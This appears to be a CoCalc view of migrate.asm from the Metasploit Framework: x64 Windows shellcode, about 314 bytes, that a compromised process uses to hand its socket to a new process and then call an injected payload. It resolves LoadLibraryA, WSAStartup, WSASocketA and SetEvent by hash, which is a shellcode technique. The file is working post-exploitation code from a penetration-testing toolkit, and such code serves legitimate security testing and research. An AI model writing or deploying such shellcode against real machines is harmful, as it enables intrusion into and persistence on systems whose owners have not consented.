CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/shellcode/windows/x64/src/migrate/migrate.asm
Views: 11791
1
;-----------------------------------------------------------------------------;

2
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)

3
; Compatible: Windows 7, 2008, 2003, XP

4
; Architecture: x64

5
; Version: 1.0 (Jan 2010)

6
; Size: 314 bytes

7
; Build: >build.py migrate

8
;-----------------------------------------------------------------------------;

9


10
; typedef struct MigrateContext

11
; {

12
; 	union

13
; 	{

14
; 		HANDLE hEvent;

15
; 		BYTE bPadding1[8];

16
; 	} e;

17
; 	union

18
; 	{

19
; 		LPVOID lpPayload;

20
; 		BYTE bPadding2[8];

21
; 	} p;

22
; 	WSAPROTOCOL_INFO info;

23
; } MIGRATECONTEXT, * LPMIGRATECONTEXT;

24


25
[BITS 64]

26
[ORG 0]

27


28
  cld                    ; Clear the direction flag.

29
  mov rsi, rcx           ; RCX is a pointer to our migration stub context

30
  sub rsp, 0x2000        ; Alloc some space on stack

31
  and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned

32
  call start             ; Call start, this pushes the address of 'api_call' onto the stack.

33
delta:                   ;

34
%include "./src/block/block_api.asm"

35
start:                   ;

36
  pop rbp                ; Pop off the address of 'api_call' for calling later.

37
  ; setup the structures we need on the stack...

38
  mov r14, 'ws2_32'      ; 

39
  push r14               ; Push the bytes 'ws2_32',0,0 onto the stack.

40
  mov rcx, rsp           ; save pointer to the "ws2_32" string for LoadLibraryA call.

41
  sub rsp, 408+8         ; alloc sizeof( struct WSAData ) bytes for the WSAData structure (+8 for alignment)

42
  mov r13, rsp           ; save pointer to the WSAData structure for WSAStartup call.

43
  sub rsp, 0x28          ; alloc space for function calls

44
  ; perform the call to LoadLibraryA...

45
  mov r10d, 0x0726774C   ; hash( "kernel32.dll", "LoadLibraryA" )

46
  call rbp               ; LoadLibraryA( "ws2_32" )

47
  ; perform the call to WSAStartup...

48
  mov rdx, r13           ; second param is a pointer to this stuct

49
  push byte 2            ;

50
  pop rcx                ; set the param for the version requested

51
  mov r10d, 0x006B8029   ; hash( "ws2_32.dll", "WSAStartup" )

52
  call rbp               ; WSAStartup( 2, &WSAData );

53
  ; perform the call to WSASocketA...

54
  xor r8, r8             ; we do not specify a protocol

55
  push r8                ; push zero for the flags param.

56
  push r8                ; push null for reserved parameter

57
  lea r9, [rsi+16]       ; We specify the WSAPROTOCOL_INFO structure from the MigrateContext

58
  push byte 1            ;

59
  pop rdx                ; SOCK_STREAM == 1

60
  push byte 2            ; 

61
  pop rcx                ; AF_INET == 2

62
  mov r10d, 0xE0DF0FEA   ; hash( "ws2_32.dll", "WSASocketA" )

63
  call rbp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, &info, 0, 0 );

64
  mov rdi, rax           ; save the socket for later

65
  ; perform the call to SetEvent...

66
  mov rcx, qword [rsi]   ; Set the first parameter to the migrate event

67
  mov r10d, 0x35269F1D   ; hash( "kernel32.dll", "SetEvent" )

68
  call rbp               ; SetEvent( hEvent );

69
  ; perform the call to the payload...

70
  call qword [rsi+8]     ; Call the payload...

71
  

72